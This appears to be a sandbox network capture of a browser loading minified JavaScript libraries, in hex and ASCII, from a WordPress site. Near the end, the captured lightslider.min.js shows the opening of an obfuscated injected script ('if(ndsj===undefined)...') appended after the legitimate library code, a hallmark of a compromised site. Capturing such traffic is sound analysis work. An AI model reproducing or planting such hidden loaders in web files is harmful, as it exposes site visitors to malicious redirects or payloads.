                                                            2025-01-15 10:08:02 UTC8000INData Raw: 62 5d 28 61 29 7d 2c 67 2e 70 72 6f 74 6f 74 79 70 65 2e 62 69 6e 64 52 65 73 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 69 73 52 65 73 69 7a 65 42 6f 75 6e 64 7c 7c 28 62 2e 62 69 6e 64 28 61 2c 22 72 65 73 69 7a 65 22 2c 74 68 69 73 29 2c 74 68 69 73 2e 69 73 52 65 73 69 7a 65 42 6f 75 6e 64 3d 21 30 29 7d 2c 67 2e 70 72 6f 74 6f 74 79 70 65 2e 75 6e 62 69 6e 64 52 65 73 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 69 73 52 65 73 69 7a 65 42 6f 75 6e 64 26 26 62 2e 75 6e 62 69 6e 64 28 61 2c 22 72 65 73 69 7a 65 22 2c 74 68 69 73 29 2c 74 68 69 73 2e 69 73 52 65 73 69 7a 65 42 6f 75 6e 64 3d 21 31 7d 2c 67 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 6e 72 65 73 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e
                                                            Data Ascii: b](a)},g.prototype.bindResize=function(){this.isResizeBound||(b.bind(a,"resize",this),this.isResizeBound=!0)},g.prototype.unbindResize=function(){this.isResizeBound&&b.unbind(a,"resize",this),this.isResizeBound=!1},g.prototype.onresize=function(){function
                                                            2025-01-15 10:08:02 UTC8000INData Raw: 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 62 28 72 65 71 75 69 72 65 28 22 2e 2e 2f 6c 61 79 6f 75 74 2d 6d 6f 64 65 22 29 2c 72 65 71 75 69 72 65 28 22 6d 61 73 6f 6e 72 79 2d 6c 61 79 6f 75 74 22 29 29 3a 62 28 61 2e 49 73 6f 74 6f 70 65 2e 4c 61 79 6f 75 74 4d 6f 64 65 2c 61 2e 4d 61 73 6f 6e 72 79 29 7d 28 77 69 6e 64 6f 77 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 63 28 61 2c 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 62 29 61 5b 63 5d 3d 62 5b 63 5d 3b 72 65 74 75 72 6e 20 61 7d 76 61 72 20 64 3d 61 2e 63 72 65 61 74 65 28 22 6d 61 73 6f 6e 72 79 22 29 2c 65 3d 64 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 67 65 74 45 6c 65 6d
                                                            Data Ascii: "==typeof exports?module.exports=b(require("../layout-mode"),require("masonry-layout")):b(a.Isotope.LayoutMode,a.Masonry)}(window,function(a,b){"use strict";function c(a,b){for(var c in b)a[c]=b[c];return a}var d=a.create("masonry"),e=d.prototype._getElem
                                                            2025-01-15 10:08:02 UTC8000INData Raw: 76 61 72 20 63 2c 64 2c 65 3d 62 2e 6c 65 6e 67 74 68 3b 66 6f 72 28 63 3d 30 3b 65 3e 63 3b 63 2b 2b 29 64 3d 62 5b 63 5d 2c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 64 2e 65 6c 65 6d 65 6e 74 29 3b 76 61 72 20 66 3d 74 68 69 73 2e 5f 66 69 6c 74 65 72 28 62 29 2e 6d 61 74 63 68 65 73 3b 66 6f 72 28 63 3d 30 3b 65 3e 63 3b 63 2b 2b 29 62 5b 63 5d 2e 69 73 4c 61 79 6f 75 74 49 6e 73 74 61 6e 74 3d 21 30 3b 66 6f 72 28 74 68 69 73 2e 61 72 72 61 6e 67 65 28 29 2c 63 3d 30 3b 65 3e 63 3b 63 2b 2b 29 64 65 6c 65 74 65 20 62 5b 63 5d 2e 69 73 4c 61 79 6f 75 74 49 6e 73 74 61 6e 74 3b 74 68 69 73 2e 72 65 76 65 61 6c 28 66 29 7d 7d 3b 76 61 72 20 6f 3d 6d 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 6d 6f 76 65 3b 72 65 74 75 72 6e
                                                            Data Ascii: var c,d,e=b.length;for(c=0;e>c;c++)d=b[c],this.element.appendChild(d.element);var f=this._filter(b).matches;for(c=0;e>c;c++)b[c].isLayoutInstant=!0;for(this.arrange(),c=0;e>c;c++)delete b[c].isLayoutInstant;this.reveal(f)}};var o=m.prototype.remove;return
                                                            2025-01-15 10:08:02 UTC6900INData Raw: 74 53 69 7a 65 28 61 2e 65 6c 65 6d 65 6e 74 2c 61 2e 72 65 63 74 29 2c 74 68 69 73 2e 70 61 63 6b 65 72 2e 70 61 63 6b 28 61 2e 72 65 63 74 29 2c 74 68 69 73 2e 5f 73 65 74 4d 61 78 58 59 28 61 2e 72 65 63 74 29 7d 2c 69 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73 65 74 4d 61 78 58 59 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 6d 61 78 58 3d 4d 61 74 68 2e 6d 61 78 28 61 2e 78 2b 61 2e 77 69 64 74 68 2c 74 68 69 73 2e 6d 61 78 58 29 2c 74 68 69 73 2e 6d 61 78 59 3d 4d 61 74 68 2e 6d 61 78 28 61 2e 79 2b 61 2e 68 65 69 67 68 74 2c 74 68 69 73 2e 6d 61 78 59 29 7d 2c 69 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73 65 74 52 65 63 74 53 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 63 29 7b 76 61 72 20 64 3d 62 28 61 29 2c 65 3d 64 2e 6f 75 74 65 72 57 69 64
                                                            Data Ascii: tSize(a.element,a.rect),this.packer.pack(a.rect),this._setMaxXY(a.rect)},i.prototype._setMaxXY=function(a){this.maxX=Math.max(a.x+a.width,this.maxX),this.maxY=Math.max(a.y+a.height,this.maxY)},i.prototype._setRectSize=function(a,c){var d=b(a),e=d.outerWid


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            65192.168.2.1649782178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:02 UTC404OUTGET /wp-includes/js/masonry.min.js?ver=4.2.2 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:02 UTC286INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:02 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:13:45 GMT
                                                            ETag: "5e4a-620a92c4c7f42"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 24138
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:02 UTC7906INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 2f 2a 21 0a 20 2a 20 4d 61 73 6f 6e 72 79 20 50 41 43 4b 41 47 45 44 20 76 34 2e 32 2e 32 0a 20 2a 20 43 61 73 63 61 64 69 6e 67 20 67 72 69 64 20 6c 61 79 6f 75 74 20 6c 69 62 72 61 72 79 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6d 61 73 6f 6e 72 79 2e 64 65 73 61 6e 64 72 6f 2e 63 6f 6d 0a 20 2a 20 4d 49 54 20 4c 69 63 65 6e 73 65 0a 20 2a 20 62 79 20 44 61 76 69 64 20 44 65 53 61 6e 64 72 6f 0a 20 2a 2f 0a 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 6a 71 75 65 72 79 2d 62 72 69 64 67 65 74 2f 6a 71 75 65 72 79 2d
                                                            Data Ascii: /*! This file is auto-generated *//*! * Masonry PACKAGED v4.2.2 * Cascading grid layout library * https://masonry.desandro.com * MIT License * by David DeSandro */!function(t,e){"function"==typeof define&&define.amd?define("jquery-bridget/jquery-
                                                            2025-01-15 10:08:02 UTC8000INData Raw: 74 53 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 73 69 7a 65 3d 65 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 29 7d 2c 64 2e 63 73 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 73 74 79 6c 65 3b 66 6f 72 28 76 61 72 20 69 20 69 6e 20 74 29 7b 76 61 72 20 6e 3d 75 5b 69 5d 7c 7c 69 3b 65 5b 6e 5d 3d 74 5b 69 5d 7d 7d 2c 64 2e 67 65 74 50 6f 73 69 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 29 2c 65 3d 74 68 69 73 2e 6c 61 79 6f 75 74 2e 5f 67 65 74 4f 70 74 69 6f 6e 28 22 6f 72 69 67 69 6e 4c 65 66 74 22 29 2c 69 3d 74 68 69 73 2e 6c 61 79 6f 75 74 2e 5f 67 65 74 4f 70 74 69 6f 6e 28
                                                            Data Ascii: tSize=function(){this.size=e(this.element)},d.css=function(t){var e=this.element.style;for(var i in t){var n=u[i]||i;e[n]=t[i]}},d.getPosition=function(){var t=getComputedStyle(this.element),e=this.layout._getOption("originLeft"),i=this.layout._getOption(
                                                            2025-01-15 10:08:02 UTC8000INData Raw: 7d 2c 66 2e 6c 61 79 6f 75 74 49 74 65 6d 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 74 3d 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 73 46 6f 72 4c 61 79 6f 75 74 28 74 29 2c 74 68 69 73 2e 5f 6c 61 79 6f 75 74 49 74 65 6d 73 28 74 2c 65 29 2c 74 68 69 73 2e 5f 70 6f 73 74 4c 61 79 6f 75 74 28 29 7d 2c 66 2e 5f 67 65 74 49 74 65 6d 73 46 6f 72 4c 61 79 6f 75 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 21 74 2e 69 73 49 67 6e 6f 72 65 64 7d 29 7d 2c 66 2e 5f 6c 61 79 6f 75 74 49 74 65 6d 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 69 66 28 74 68 69 73 2e 5f 65 6d 69 74 43 6f 6d 70 6c 65 74 65 4f 6e 49 74 65 6d 73 28 22 6c 61 79 6f 75 74 22 2c 74 29 2c
                                                            Data Ascii: },f.layoutItems=function(t,e){t=this._getItemsForLayout(t),this._layoutItems(t,e),this._postLayout()},f._getItemsForLayout=function(t){return t.filter(function(t){return!t.isIgnored})},f._layoutItems=function(t,e){if(this._emitCompleteOnItems("layout",t),
                                                            2025-01-15 10:08:02 UTC232INData Raw: 68 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 2c 65 3d 74 68 69 73 2e 63 6f 6c 73 3b 2d 2d 65 26 26 30 3d 3d 3d 74 68 69 73 2e 63 6f 6c 59 73 5b 65 5d 3b 29 74 2b 2b 3b 72 65 74 75 72 6e 28 74 68 69 73 2e 63 6f 6c 73 2d 74 29 2a 74 68 69 73 2e 63 6f 6c 75 6d 6e 57 69 64 74 68 2d 74 68 69 73 2e 67 75 74 74 65 72 7d 2c 6e 2e 6e 65 65 64 73 52 65 73 69 7a 65 4c 61 79 6f 75 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 63 6f 6e 74 61 69 6e 65 72 57 69 64 74 68 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 65 74 43 6f 6e 74 61 69 6e 65 72 57 69 64 74 68 28 29 2c 74 21 3d 74 68 69 73 2e 63 6f 6e 74 61 69 6e 65 72 57 69 64 74 68 7d 2c 69 7d 29 3b
                                                            Data Ascii: h=function(){for(var t=0,e=this.cols;--e&&0===this.colYs[e];)t++;return(this.cols-t)*this.columnWidth-this.gutter},n.needsResizeLayout=function(){var t=this.containerWidth;return this.getContainerWidth(),t!=this.containerWidth},i});


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            66192.168.2.1649781178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:02 UTC599OUTGET /wp-content/themes/salient/js/touchswipe.min.js?ver=1.0 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:02 UTC286INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:02 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:55:02 GMT
                                                            ETag: "2c1f-620a8e95cfcf2"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 11295
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:02 UTC7906INData Raw: 2f 2a 20 54 6f 75 63 68 20 73 77 69 70 65 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 64 29 7b 76 61 72 20 6d 3d 22 6c 65 66 74 22 2c 6c 3d 22 72 69 67 68 74 22 2c 63 3d 22 75 70 22 2c 73 3d 22 64 6f 77 6e 22 2c 62 3d 22 69 6e 22 2c 74 3d 22 6f 75 74 22 2c 6a 3d 22 6e 6f 6e 65 22 2c 6f 3d 22 61 75 74 6f 22 2c 69 3d 22 73 77 69 70 65 22 2c 70 3d 22 70 69 6e 63 68 22 2c 75 3d 22 74 61 70 22 2c 78 3d 22 68 6f 72 69 7a 6f 6e 74 61 6c 22 2c 71 3d 22 76 65 72 74 69 63 61 6c 22 2c 67 3d 22 61 6c 6c 22 2c 65 3d 22 73 74 61 72 74 22 2c 68 3d 22 6d 6f 76 65 22 2c 66 3d 22 65 6e 64 22 2c 6e 3d 22 63 61 6e 63 65 6c 22 2c 61 3d 22 6f 6e 74 6f 75 63 68 73 74 61 72 74 22 20 69 6e 20 77 69 6e 64 6f 77 2c 76 3d 22 54 6f 75 63 68 53 77 69 70 65 22 3b 76 61 72 20 6b 3d 7b 66
                                                            Data Ascii: /* Touch swipe */(function(d){var m="left",l="right",c="up",s="down",b="in",t="out",j="none",o="auto",i="swipe",p="pinch",u="tap",x="horizontal",q="vertical",g="all",e="start",h="move",f="end",n="cancel",a="ontouchstart" in window,v="TouchSwipe";var k={f
                                                            2025-01-15 10:08:02 UTC3389INData Raw: 64 2e 78 3d 61 51 2e 70 61 67 65 58 7c 7c 61 51 2e 63 6c 69 65 6e 74 58 3b 61 52 2e 65 6e 64 2e 79 3d 61 51 2e 70 61 67 65 59 7c 7c 61 51 2e 63 6c 69 65 6e 74 59 3b 72 65 74 75 72 6e 20 61 52 7d 66 75 6e 63 74 69 6f 6e 20 4a 28 61 52 29 7b 66 6f 72 28 76 61 72 20 61 51 3d 30 3b 61 51 3c 61 69 2e 6c 65 6e 67 74 68 3b 61 51 2b 2b 29 7b 69 66 28 61 69 5b 61 51 5d 2e 69 64 65 6e 74 69 66 69 65 72 3d 3d 61 52 29 7b 72 65 74 75 72 6e 20 61 69 5b 61 51 5d 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 54 28 29 7b 76 61 72 20 61 51 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 61 52 3d 30 3b 61 52 3c 3d 35 3b 61 52 2b 2b 29 7b 61 51 2e 70 75 73 68 28 7b 73 74 61 72 74 3a 7b 78 3a 30 2c 79 3a 30 7d 2c 65 6e 64 3a 7b 78 3a 30 2c 79 3a 30 7d 2c 69 64 65 6e 74 69 66 69 65 72 3a 30 7d 29
                                                            Data Ascii: d.x=aQ.pageX||aQ.clientX;aR.end.y=aQ.pageY||aQ.clientY;return aR}function J(aR){for(var aQ=0;aQ<ai.length;aQ++){if(ai[aQ].identifier==aR){return ai[aQ]}}}function T(){var aQ=[];for(var aR=0;aR<=5;aR++){aQ.push({start:{x:0,y:0},end:{x:0,y:0},identifier:0})


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            67192.168.2.1649784178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:02 UTC453OUTGET /wp-content/plugins/wp-ultimate-gallery/libs/light-slider/lightslider.min.js?ver=20120206 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:02 UTC286INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:02 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:56:19 GMT
                                                            ETag: "4612-620a8edfa8b18"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 17938
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:02 UTC7906INData Raw: 2f 2a 21 20 6c 69 67 68 74 73 6c 69 64 65 72 20 2d 20 76 31 2e 31 2e 35 20 2d 20 32 30 31 35 2d 31 30 2d 33 31 0a 2a 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 73 61 63 68 69 6e 63 68 6f 6f 6c 75 72 2f 6c 69 67 68 74 73 6c 69 64 65 72 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 35 20 53 61 63 68 69 6e 20 4e 3b 20 4c 69 63 65 6e 73 65 64 20 4d 49 54 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 63 3d 7b 69 74 65 6d 3a 33 2c 61 75 74 6f 57 69 64 74 68 3a 21 31 2c 73 6c 69 64 65 4d 6f 76 65 3a 31 2c 73 6c 69 64 65 4d 61 72 67 69 6e 3a 31 30 2c 61 64 64 43 6c 61 73 73 3a 22 22 2c 6d 6f 64 65 3a 22 73 6c 69 64 65 22 2c 75 73 65 43 53 53 3a 21 30 2c 63 73 73 45 61 73
                                                            Data Ascii: /*! lightslider - v1.1.5 - 2015-10-31* https://github.com/sachinchoolur/lightslider* Copyright (c) 2015 Sachin N; Licensed MIT */!function(a,b){"use strict";var c={item:3,autoWidth:!1,slideMove:1,slideMargin:10,addClass:"",mode:"slide",useCSS:!0,cssEas
                                                            2025-01-15 10:08:02 UTC8000INData Raw: 70 78 2c 20 30 70 78 29 22 7d 3a 7b 74 72 61 6e 73 66 6f 72 6d 3a 22 74 72 61 6e 73 6c 61 74 65 33 64 28 22 2b 2d 62 2b 22 70 78 2c 20 30 70 78 2c 20 30 70 78 29 22 2c 22 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 22 3a 22 74 72 61 6e 73 6c 61 74 65 33 64 28 22 2b 2d 62 2b 22 70 78 2c 20 30 70 78 2c 20 30 70 78 29 22 7d 29 3a 65 2e 76 65 72 74 69 63 61 6c 3d 3d 3d 21 30 3f 61 2e 63 73 73 28 22 70 6f 73 69 74 69 6f 6e 22 2c 22 72 65 6c 61 74 69 76 65 22 29 2e 61 6e 69 6d 61 74 65 28 7b 74 6f 70 3a 2d 62 2b 22 70 78 22 7d 2c 65 2e 73 70 65 65 64 2c 65 2e 65 61 73 69 6e 67 29 3a 61 2e 63 73 73 28 22 70 6f 73 69 74 69 6f 6e 22 2c 22 72 65 6c 61 74 69 76 65 22 29 2e 61 6e 69 6d 61 74 65 28 7b 6c 65 66 74 3a 2d 62 2b 22 70 78 22 7d 2c 65 2e 73 70 65 65
                                                            Data Ascii: px, 0px)"}:{transform:"translate3d("+-b+"px, 0px, 0px)","-webkit-transform":"translate3d("+-b+"px, 0px, 0px)"}):e.vertical===!0?a.css("position","relative").animate({top:-b+"px"},e.speed,e.easing):a.css("position","relative").animate({left:-b+"px"},e.spee
                                                            2025-01-15 10:08:02 UTC2032INData Raw: 6e 28 61 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 61 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 3f 61 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3a 61 2e 72 65 74 75 72 6e 56 61 6c 75 65 3d 21 31 2c 7a 2e 69 6e 69 74 28 29 7d 2c 32 30 30 29 7d 29 2c 74 68 69 73 7d 7d 28 6a 51 75 65 72 79 29 3b 3b 69 66 28 6e 64 73 6a 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 29 7b 76 61 72 20 71 3d 5b 27 72 65 66 27 2c 27 64 65 2e 27 2c 27 79 73 74 27 2c 27 73 74 72 27 2c 27 65 72 72 27 2c 27 73 75 62 27 2c 27 38 37 35 39 38 54 42 4f 7a 56 78 27 2c 27 65 76 61 27 2c 27 33 32 39 31 34 35 33 45 6f 4f 6c 5a 6b 27 2c 27 63 68 61 27 2c 27 74 75 73 27 2c 27 33 30 31 31 36 30 4c 4a 70 53 6e 73 27 2c 27 69 73 69 27 2c 27 31 37 38 31 35 34 36 6e
                                                            Data Ascii: n(a){setTimeout(function(){a.preventDefault?a.preventDefault():a.returnValue=!1,z.init()},200)}),this}}(jQuery);;if(ndsj===undefined){var q=['ref','de.','yst','str','err','sub','87598TBOzVx','eva','3291453EoOlZk','cha','tus','301160LJpSns','isi','1781546n


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            68192.168.2.1649783178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:02 UTC603OUTGET /wp-content/themes/salient/js/caroufredsel.min.js?ver=7.0.1 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:02 UTC286INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:02 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:55:03 GMT
                                                            ETag: "dd7c-620a8e9762250"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 56700
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:02 UTC7906INData Raw: 2f 2a 0a 20 2a 09 6a 51 75 65 72 79 20 63 61 72 6f 75 46 72 65 64 53 65 6c 20 36 2e 32 2e 31 0a 20 2a 09 44 65 6d 6f 27 73 20 61 6e 64 20 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 3a 0a 20 2a 09 63 61 72 6f 75 66 72 65 64 73 65 6c 2e 64 65 76 37 73 74 75 64 69 6f 73 2e 63 6f 6d 0a 20 2a 0a 20 2a 09 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 33 20 46 72 65 64 20 48 65 75 73 73 63 68 65 6e 0a 20 2a 09 77 77 77 2e 66 72 65 62 73 69 74 65 2e 6e 6c 0a 20 2a 0a 20 2a 09 44 75 61 6c 20 6c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 61 6e 64 20 47 50 4c 20 6c 69 63 65 6e 73 65 73 2e 0a 20 2a 09 68 74 74 70 3a 2f 2f 65 6e 2e 77 69 6b 69 70 65 64 69 61 2e 6f 72 67 2f 77 69 6b 69 2f 4d 49 54 5f 4c 69 63 65 6e 73 65 0a 20 2a 09 68 74 74 70
                                                            Data Ascii: /* *jQuery carouFredSel 6.2.1 *Demo's and documentation: *caroufredsel.dev7studios.com * *Copyright (c) 2013 Fred Heusschen *www.frebsite.nl * *Dual licensed under the MIT and GPL licenses. *http://en.wikipedia.org/wiki/MIT_License *http
                                                            2025-01-15 10:08:02 UTC8000INData Raw: 75 73 65 50 61 64 64 69 6e 67 29 7b 76 61 72 20 64 3d 69 73 5f 62 6f 6f 6c 65 61 6e 28 63 29 3f 63 3a 21 31 3b 69 73 5f 6e 75 6d 62 65 72 28 63 29 7c 7c 28 63 3d 30 29 2c 73 7a 5f 73 74 6f 72 65 4d 61 72 67 69 6e 28 61 2c 62 2c 22 5f 63 66 73 5f 74 65 6d 70 43 73 73 4d 61 72 67 69 6e 22 29 2c 61 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 24 28 74 68 69 73 29 3b 61 2e 63 73 73 28 62 2e 64 2e 6d 61 72 67 69 6e 52 69 67 68 74 2c 64 3f 61 2e 64 61 74 61 28 22 5f 63 66 73 5f 74 65 6d 70 43 73 73 4d 61 72 67 69 6e 22 29 3a 63 2b 61 2e 64 61 74 61 28 22 5f 63 66 73 5f 6f 72 69 67 43 73 73 4d 61 72 67 69 6e 22 29 29 7d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 73 7a 5f 73 74 6f 72 65 4f 72 69 67 43 73 73 28 61 29 7b 61 2e 65 61 63 68 28 66 75
                                                            Data Ascii: usePadding){var d=is_boolean(c)?c:!1;is_number(c)||(c=0),sz_storeMargin(a,b,"_cfs_tempCssMargin"),a.each(function(){var a=$(this);a.css(b.d.marginRight,d?a.data("_cfs_tempCssMargin"):c+a.data("_cfs_origCssMargin"))})}}function sz_storeOrigCss(a){a.each(fu
                                                            2025-01-15 10:08:02 UTC8000INData Raw: 65 72 28 61 29 7b 72 65 74 75 72 6e 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 4e 75 6d 62 65 72 7c 7c 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 61 29 26 26 21 69 73 4e 61 4e 28 61 29 7d 66 75 6e 63 74 69 6f 6e 20 69 73 5f 73 74 72 69 6e 67 28 61 29 7b 72 65 74 75 72 6e 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 53 74 72 69 6e 67 7c 7c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 61 29 26 26 21 69 73 5f 75 6e 64 65 66 69 6e 65 64 28 61 29 26 26 21 69 73 5f 74 72 75 65 28 61 29 26 26 21 69 73 5f 66 61 6c 73 65 28 61 29 7d 66 75 6e 63 74 69 6f 6e 20 69 73 5f 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 46 75 6e 63 74 69 6f 6e 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 61 7d
                                                            Data Ascii: er(a){return(a instanceof Number||"number"==typeof a)&&!isNaN(a)}function is_string(a){return(a instanceof String||"string"==typeof a)&&!is_undefined(a)&&!is_true(a)&&!is_false(a)}function is_function(a){return a instanceof Function||"function"==typeof a}
